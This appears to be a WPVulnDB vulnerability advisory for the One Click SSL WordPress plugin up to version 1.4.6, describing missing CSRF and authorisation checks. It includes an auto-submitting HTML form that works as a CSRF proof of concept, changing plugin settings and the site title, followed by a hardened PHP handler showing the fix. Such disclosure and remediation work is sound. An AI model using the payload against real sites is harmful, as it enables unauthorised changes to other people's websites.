wpexploit | Wpvulndb | WPEX-ID:F03156D3-0B6A-4FA6-A2B0-7218F3BA40A4
Jul 11, 2019 - 12:00 a.m.

One Click SSL <= 1.4.6 - Multiple Issues


EPSS: 0.002 (Low), percentile 51.5%

The settings page, as well as AJAX methods such as ajax_enable_ssl(), ajax_scan() and so on, lack CSRF and authorisation checks. This could allow unauthorised settings changes and let a low-privileged user call the AJAX methods. Additionally, the way update_option() and update_site_option() are used in the admin() and admin_network() functions could allow arbitrary site options to be updated.

<html>
  <body onload="document.forms[0].submit()">
    <form action="https://<BLOG>/wp-admin/admin.php?page=one-click-ssl" method="POST">
      <!-- Plugin's Settings -->
      <input type="hidden" name="ocssl_toolsmenu" value="1"/>
      <input type="hidden" name="ocssl_nonsslredirect" value="1"/>
      <!-- WP Options -->
      <input type="hidden" name="blogname" value="Owned"/>
    </form>
  </body>
</html>
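
For comparison, a hardened settings and AJAX handler that applies the three missing controls named in the description (capability check, nonce check, option allowlist). This is an added example, not One Click SSL's own code: the function names, the nonce action and the AJAX action are hypothetical, and it assumes the two ocssl_* settings are stored under the field names shown in the form above.

```php
<?php
// Added example, not the plugin's code. Names prefixed ocssl_example_ are
// hypothetical; the two ocssl_* keys are the field names from the form above.

const OCSSL_EXAMPLE_NONCE = 'ocssl_example_save_settings'; // hypothetical action

// Only these keys may ever reach update_option(), each with its own sanitizer.
function ocssl_example_allowed_options() {
    return array(
        'ocssl_toolsmenu'      => 'absint',
        'ocssl_nonsslredirect' => 'absint',
    );
}

// Called when the settings page receives a POST.
function ocssl_example_save_settings() {
    // Authorisation: only administrators may change settings.
    // (A network settings page would check 'manage_network_options' instead.)
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Forbidden', 403 );
    }
    // CSRF: dies unless the request carries a valid nonce for this action.
    check_admin_referer( OCSSL_EXAMPLE_NONCE );

    // Iterate over the allowlist, never over $_POST, so a posted key such as
    // "blogname" is simply never read and cannot be written.
    foreach ( ocssl_example_allowed_options() as $key => $sanitize ) {
        if ( isset( $_POST[ $key ] ) ) {
            $value = call_user_func( $sanitize, wp_unslash( $_POST[ $key ] ) );
            update_option( $key, $value );
        }
    }
}

// AJAX handler guarded by the same two checks before any work is done.
function ocssl_example_ajax_scan() {
    check_ajax_referer( OCSSL_EXAMPLE_NONCE, 'nonce' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'Forbidden', 403 );
    }
    // The scan itself would run here, after both checks have passed.
    wp_send_json_success();
}
add_action( 'wp_ajax_ocssl_example_scan', 'ocssl_example_ajax_scan' );

// The settings form template must emit the matching hidden field:
// wp_nonce_field( OCSSL_EXAMPLE_NONCE );
```

With these checks in place, the auto-submitting form above fails at check_admin_referer() because a cross-site page cannot supply a valid nonce for the logged-in administrator.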
